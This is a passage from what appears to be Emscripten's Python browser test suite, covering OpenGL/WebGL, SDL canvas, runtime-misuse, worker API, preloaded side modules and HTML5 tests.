def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-sGL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-sGL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sUSE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '-sRELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-sGL_DEBUG', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre3.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-sUSE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-sUSE_PTHREADS', '-sUSE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(Path('third_party/cubegeom', 'cubegeom_proc.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_glew.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-sLEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_color.c'), reference=Path('third_party/cubegeom', 'cubegeom_color.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_normal.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
  def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_mt.c'), reference=Path('third_party/cubegeom', 'cubegeom_mt.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_color2.c'), reference=Path('third_party/cubegeom', 'cubegeom_color2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_texturematrix.c'), reference=Path('third_party/cubegeom', 'cubegeom_texturematrix.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_fog.c'), reference=Path('third_party/cubegeom', 'cubegeom_fog.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sUSE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2_vao2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao_es.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sFULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_u4fv_2.c'), reference=Path('third_party/cubegeom', 'cubegeom_u4fv_2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-sINITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-sINITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-sLEGACY_GL_EMULATION', '-sGL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(test_file('water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-sLEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-sSTRICT'],
['--closure=1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_file('header.h', r'''
struct point {
int x, y;
};
''')
create_file('supp.c', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point *p) {
printf("supp: %d,%d\n", p->x, p->y);
mainFunc(p->x + p->y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_file('main.c', r'''
#include <stdio.h>
#include <assert.h>
#include "header.h"
extern void suppFunc(struct point *p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
assert(x == 56);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(&p);
printf("main see: %d\nok.\n", suppInt);
assert(suppInt == 76);
return 0;
}
''')
self.run_process([EMCC, 'supp.c', '-o', 'supp.wasm', '-sSIDE_MODULE', '-O2'])
self.btest_exit('main.c', args=['-sMAIN_MODULE=2', '-O2', 'supp.wasm'])
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
self.set_setting('WASM_ASYNC_COMPILATION', 0)
create_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_file('post.js', '''
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
args = ['-sWASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1']
# with assertions, we notice when memory was written to too early
expected = 'abort:Assertion failed: native function `note` called before runtime initialization'
self.btest('mem_init.cpp', expected=expected, args=args)
# otherwise, we just overwrite
self.btest_exit('mem_init.cpp', args=args + ['-sASSERTIONS=0'])
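# A page may create Module.memoryInitializerRequest itself (an XHR for the .mem
# file); the runtime then reuses that in-flight request instead of issuing its
# own. Check both a request for the real .mem file and one for a bogus URL.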
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
maybeReportResultToServer('got_error');
}
console.log('WARNING: ' + x);
};
''')
self.btest('mem_init_request.cpp', expected=status, args=['-sWASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
self.set_setting('EXIT_RUNTIME')
test('test.html.mem', 'exit:0')
test('nothing.nowhere', 'got_error')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution will abort
} catch(e) {
out('expected fail 3:' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-sWASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-sEXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-sEXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(Path('browser/cwrap_early.cpp'), args=['-O2', '-sASSERTIONS', '--pre-js', test_file('browser/cwrap_early.js'), '-sEXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0')
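# worker_api_worker.cpp is compiled as a standalone worker (-sBUILD_AS_WORKER)
# exporting _one; the main program then drives it through the emscripten worker API.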
def test_worker_api(self):
self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-O2', '--minify=0', '-sEXPORTED_FUNCTIONS=_one,_two,_three,_four', '--closure=1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one', '-sASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_with_pthread_compilation_fails(self):
self.run_process([EMCC, '-c', '-o', 'hello.o', test_file('hello_world.c')])
stderr = self.expect_fail([EMCC, 'hello.o', '-o', 'a.js', '-g', '--closure=1', '-sUSE_PTHREADS', '-sBUILD_AS_WORKER=1'])
self.assertContained("USE_PTHREADS + BUILD_AS_WORKER require separate modes that don't work together, see https://github.com/emscripten-core/emscripten/issues/8854", stderr)
def test_emscripten_async_wget2(self):
self.btest_exit('test_emscripten_async_wget2.cpp')
@disabled('https://github.com/emscripten-core/emscripten/issues/15818')
def test_emscripten_async_wget2_data(self):
create_file('hello.txt', 'Hello Emscripten!')
self.btest('test_emscripten_async_wget2_data.cpp', expected='0')
def test_emscripten_async_wget_side_module(self):
self.run_process([EMCC, test_file('browser_module.c'), '-o', 'lib.wasm', '-O2', '-sSIDE_MODULE'])
self.btest_exit('browser_main.c', args=['-O2', '-sMAIN_MODULE=2'])
@parameterized({
'non-lz4': ([],),
'lz4': (['-sLZ4'],)
})
def test_preload_module(self, args):
create_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.run_process([EMCC, 'library.c', '-sSIDE_MODULE', '-O2', '-o', 'library.so'])
create_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return preloadedWasm['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
args=['-sMAIN_MODULE=2', '--preload-file', '.@/', '-O2', '--use-preload-plugins'] + args)
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compile.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest_exit('hello_world_gles.c', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid/test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = read_file('test.js')
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(test_file('uuid/test.js'))
try_delete(test_file('uuid/test.js.map'))
# Now run test in browser
self.btest_exit(test_file('uuid/test.c'), args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-sLEGACY_GL_EMULATION'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-sLEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure=1', '-sHTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],),
'legacy': (['-sMIN_FIREFOX_VERSION=0', '-sMIN_SAFARI_VERSION=0', '-sMIN_IE_VERSION=0', '-sMIN_EDGE_VERSION=0', '-sMIN_CHROME_VERSION=0', '-Wno-transpile'],)
})
@requires_threads
def test_html5_core(self, opts):
if '-sHTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0' in opts:
# In this mode an exception can be thrown by the browser, and we don't
# want the test to fail in that case so we override the error handling.
create_file('pre.js', '''
window.disableErrorReporting = true;
window.addEventListener('error', (event) => {
if (!event.message.includes('exception:fullscreen error')) {
report_error(event);
}
});
''')
self.emcc_args.append('--pre-js=pre.js')
self.btest(test_file('test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
print(opts)
self.btest_exit(test_file('test_gamepad.c'), args=[] + opts)
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sFULL_ES2=1'], ['-sUSE_PTHREADS']]:
print(opts)
self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-lGL'])
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context on Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest_exit(test_file('webgl_create_context2.cpp'))
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context on Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -sDISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(test_file('browser/html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL'])
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest_exit(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL'])
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
@requires_graphics_hardware
def test_webgl_shader_source_length(self):
for opts in [[], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL'])
# Tests calling glGetString(GL_UNMASKED_VENDOR_WEBGL).
@requires_graphics_hardware
def test_webgl_unmasked_vendor_webgl(self):
self.btest_exit(test_file('webgl_unmasked_vendor_webgl.c'), args=['-lGL'])
@requires_graphics_hardware
def test_webgl2(self):
for opts in [
['-sMIN_CHROME_VERSION=0', '-Wno-transpile'],
['-O2', '-g1', '--closure=1', '-sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-sFULL_ES2=1'],
]:
print(opts)
self.btest_exit(test_file('webgl2.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'] + opts)
# Tests the WebGL 2 glGetBufferSubData() functionality.
@requires_graphics_hardware
def test_webgl2_get_buffer_sub_data(self):
self.btest_exit(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
